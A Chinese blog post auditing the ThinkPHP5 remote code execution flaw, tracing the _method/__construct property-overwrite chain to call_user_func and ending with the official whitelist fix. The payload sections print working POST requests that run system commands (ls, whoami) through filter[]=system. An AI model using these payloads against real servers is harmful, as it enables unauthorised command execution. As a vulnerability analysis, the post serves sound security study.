ThinkPHP5 远程代码执行(POST)

最新推荐文章于 2024-04-30 00:10:58 发布
最新推荐文章于 2024-04-30 00:10:58 发布
阅读量1.7k 收藏 7
点赞数 1
分类专栏: # ThinkPHP代码审计 文章标签: thinkphp 代码审计 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/119731134
版权

ThinkPHP5 远程代码执行(POST)

漏洞概要

  • 本次漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致远程代码执行漏洞的产生
  • 漏洞影响版本:
    5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30

初始配置

获取测试环境代码

composer create-project --prefer-dist topthink/think=5.0.20 tpdemo

在这里插入图片描述

将 composer.json 文件的 require 字段设置成如下

"require": {
    "php": ">=5.4.0",
    "topthink/framework": "5.0.23"
},

然后执行 composer update

在这里插入图片描述

漏洞利用

Payload

# ThinkPHP <= 5.0.13
POST /?s=index/index
s=whoami&_method=__construct&method=&filter[]=system

# ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al

# ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha
POST /?s=xxx HTTP/1.1
_method=__construct&filter[]=system&method=get&get[]=ls+-al
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

在这里插入图片描述

漏洞分析

从官方的修复代码中可以很明显的看出 $method 来自可控的 $_POST 数组,而且在获取之后没有进行任何检查直接把它作为 Request 类的方法进行调用,同时该方法传入的参数是可控数据 $_POST,也就相当于可以随意调用 Request 类的部分方法

在这里插入图片描述
在这里插入图片描述

同时可以观察到 Request 类的 __construct 方法中存在类属性覆盖的功能,这对之后的利用非常有利, Request 类的所有属性如下

protected $get                  protected static $instance;
protected $post                 protected $method;
protected $request              protected $domain;
protected $route                protected $url;
protected $put;                 protected $baseUrl;
protected $session              protected $baseFile;
protected $file                 protected $root;
protected $cookie               protected $pathinfo;
protected $server               protected $path;
protected $header               protected $routeInfo 
protected $mimeType             protected $env;
protected $content;             protected $dispatch 
protected $filter;              protected $module;
protected static $hook          protected $controller;
protected $bind                 protected $action;
protected $input;               protected $langset;
protected $cache;               protected $param   
protected $isCheckCache;

在这里插入图片描述

继续跟进程序发现如果框架在配置文件中开启了 debug 模式( ‘app_debug’=> true ),程序会调用 Request 类的 param 方法,这个方法需要特别关注了,因为 Request 类中的 param、route、get、post、put、delete、patch、request、session、server、env、cookie、input 方法均调用了 filterValue 方法,而该方法中就存在可利用的 call_user_func 函数。

在这里插入图片描述
在这里插入图片描述

跟进 param 方法后发现其调用 method 方法, method 方法会调用 server 方法,而在 server 方法中把 $this->server 传入了 input 方法,这个 $this->server 的值可以通过先前 Request 类的 __construct 方法来覆盖赋值,当可控数据作为 $data 传入 input 方法时,$data 会被 filterValue 方法使用 $filter 过滤器处理,其中 $filter 的值部分来自 $this->filter ,又是可以通过先前 Request 类的 __construct 方法来覆盖赋值

在这里插入图片描述

在这里插入图片描述

接下来就是 filterValue 方法调用 call_user_func 处理数据的过程,代码执行也就是发生在这里

在这里插入图片描述

接下来再来看看如果没有开启框架调试模式,是否可以利用该漏洞,在 run 方法中会执行一个 exec 方法,当该方法中的 $dispatch['type'] 等于 controller 或者 method 时,又会调用 Request 类的 param 方法

在这里插入图片描述
在这里插入图片描述

跟进 Request 类的 param 方法,其后面的调用过程又会和先前的分析一样了
现在还要解决一个问题,就是如何让 $dispatch['type'] 等于 controller 或者 method ,通过跟踪代码发现 $dispatch['type'] 来源于 parseRule 方法中的 $result 变量,而 $result 变量又与 $route 变量有关系,这个 $route 变量取决于程序中定义的路由地址方式

在这里插入图片描述
在这里插入图片描述

ThinkPHP5 中支持5种路由地址方式定义

定义方式定义格式
方式1:路由到模块/控制器‘[模块/控制器/操作]?额外参数1=值1&额外参数2=值2…’
方式2:路由到重定向地址‘外部地址’(默认301重定向) 或者 [‘外部地址’,‘重定向代码’]
方式3:路由到控制器的方法‘@[模块/控制器/]操作’
方式4:路由到类的方法‘\完整的命名空间类::静态方法’ 或者 ‘\完整的命名空间类@动态方法’
方式5:路由到闭包函数闭包函数定义(支持参数传入)

在 ThinkPHP5 完整版中,定义了验证码类的路由地址,程序在初始化时会通过自动类加载机制,将 vendor 目录下的文件加载,这样在 GET 方式中便多了这一条路由,可以利用这一路由地址使得 $dispatch['type'] 等于 method ,从而完成远程代码执行漏洞

构造出的Payload

POST /index.php?s=captcha HTTP/1.1
    ⋮
Content-Length: 59

_method=__construct&filter[]=system&method=get&get[]=ls+-al
# 或者
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

漏洞修复

官方的修复方法是:对请求方法 $method 进行白名单校验

在这里插入图片描述

攻击总结

参考Mochazz师傅的审计流程

在这里插入图片描述

H3rmesk1t
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ThinkPHP5.0.*版本代码执行漏洞
锋刃科技的博客
01-12 3万+
我们先看处理请求的Request类,在thinkphp/ library/think/Request.php。 Method方法来获取当前的请求类型。 isGet、isPOST、isPUT等方法都调用了method方法来做请求类型的判断。 而在默认情况下,是有表单伪装变量的 在默认情况下,该变量值为_method 在Method方法中,将表单伪装变量对该方法的变量进行...
thinkphp5模拟post请求_thinkphp5的get和post数据封装的方法介绍(代码
weixin_39595430的博客
12-21 1368
本篇文章给大家带来的内容是关于thinkphp5的get和post数据封装的方法介绍(代码),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。thinkphp5的get和post数据封装一、view(html页面获取数据)二、控制器一、view(html页面获取数据) 搜索二、控制器1、正常情况下我们是这样操作的public function index(){$where['stat...
ThinkPHP5远程代码执行(CNVD-2018-24942)
ANOrange的博客
04-03 512
ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。本文包含POC和ThinkPHP漏洞利用工具
ThinkPHP5--rce远程代码执行
最新发布
m0_74402888的博客
04-30 520
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
tp5 CURL POST
老王子的博客
06-12 1679
php curl post header
thinkPHP5.1框架路由::get、post请求简单用法示例
01-20
本文实例讲述了thinkPHP5.1框架路由::get、post请求简单用法。分享给大家供大家参考,具体如下: 1、在index模块下的控制器index里面建立一个type方法 public function type(){ var_dump(input()); echo '我是测试类型'; return view(); } 2、在index模块下新建view视图建立index文件夹创建type.html页面 <!DOCTYPE html> <html lang=en> <head> <meta charset=UTF-8> <title>Title</title>
关于TP5会自动修改json字段类型问题
阿盘的博客
09-14 478
遇到的问题 当前端POST JSON数据到接口时, JSON中原本的int类型会被转化为string。 举个例子 // 前端传递的数据 { "id": 30, "name": "流程1", "description": "这里是流程1", "step": 1, } // 使用TP框架的获取方法 $this->request->post(); 接口接收到的数据直接就转化为string类型了 分析与解决方法 通过查看think/Request源码,我们可以知道:在(当
项目里远程调用POST/GET接口时使用的方法
OneMaruko的博客
07-14 1023
项目里远程调用POST/GET接口时使用的方法
thinkphp,get请求成功,post请求异常,返回404
大炮哥的博客
12-03 2341
情景: thinkphp的某个路由设置,Route::get('login', 'User/login'); http://www.xxx.com/login 发起get请求,200成功 发起post请求,404错误 原因: get请求时,thinkphp的路由会找到controller为User,并调用login方法; 但post请求时,访问地址变成了http://www.xxx.com/login/index,因此报错 解决方法: 将请求地址改为“域名+控制器+方法” 例如:http://www.x
TP5的POST接收数组报错variable type error:array
qq_25359841的博客
03-25 848
TP5的POST接收数组报错variable type error:array 数组的报错是: variable type error:array 原因:post提交数据不能提交数组和对象 。 解决方法: 在接收的时候在数据的后面加/a,传递对象的时候也是加/a 例如: Request::instance()->post('参数/a'); ...
一个常用的通过CURL发送HTTP请求的函数 ThinkPHP
livesmo的博客
07-28 5327
在这里我也来分享一下我正在系统里用到的一个通过cURL来发送HTTP请求的函数。 /** * 发送HTTP请求方法 * @param string $url 请求URL * @param array $params 请求参数 * @param string $method 请求方法GET/POST * @return array
thinkphp5模拟post请求_thinkPHP5.1框架路由::get、post请求简单用法示例
weixin_40002238的博客
12-21 795
本文实例讲述了thinkPHP5.1框架路由::get、post请求简单用法。分享给大家供大家参考,具体如下:1、在index模块下的控制器index里面建立一个type方法public function type(){var_dump(input());echo '我是测试类型';return view();}2、在index模块下新建view视图建立index文件夹创建type.html页面T...
Thinkphp5中用POST搜索条件分页,分页失效,点击下一页时搜索条件被重置的解决办法
远方的猫的博客
07-09 3510
最近做项目,在分页的这里出现了问题,因为后台是iframe模式的,所以在条件搜索查询分页时,点击下一页导致所有的搜索条件被重置,分页效果就失效了,在网上查询了半天,发现全是没用的信息,要么就是TP3.2.3的,Page类早就没有了。以下是网上部分解决办法:大部分都是没解决问题,要么就是说为啥要用post当然,这不是用不用的问题,有问题就要解决,而不是逃避,不然不是一个好码农。好啦,不多说,找解决办...
thinkphp5模拟post请求_thinkPHP5.1框架路由::get、post请求简单用法示例|chu
weixin_39555715的博客
12-21 525
本文实例讲述了thinkPHP5.1框架路由::get、post请求简单用法。分享给大家供大家参考,具体如下:1、在index模块下的控制器index里面建立一个type方法public function type(){ var_dump(input()); echo '我是测试类型'; return view(); }2、在index模块下新建view视图建立index文件夹...
Tp5请求
fly_horses的博客
03-06 1568
tp5.1html打印post,thinkPHP5.1框架路由::get、post请求简单用法示例
weixin_42338883的博客
06-18 540
本文实例讲述了thinkPHP5.1框架路由::get、post请求简单用法。分享给大家供大家参考,具体如下:1、在index模块下的控制器index里面建立一个type方法public function type(){var_dump(input());echo '我是测试类型';return view();}2、在index模块下新建view视图建立index文件夹创建type.html页面T...
ThinkPHP 5.0 远程代码执行漏洞详解
"ThinkPHP 5.0 远程代码执行漏洞分析" 在网络安全领域,远程代码执行漏洞是一种极其危险的漏洞,允许攻击者在受害者的服务器上执行任意代码。这篇关于ThinkPHP 5.0 远程代码执行的分析报告,专注于探讨了如何利用这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值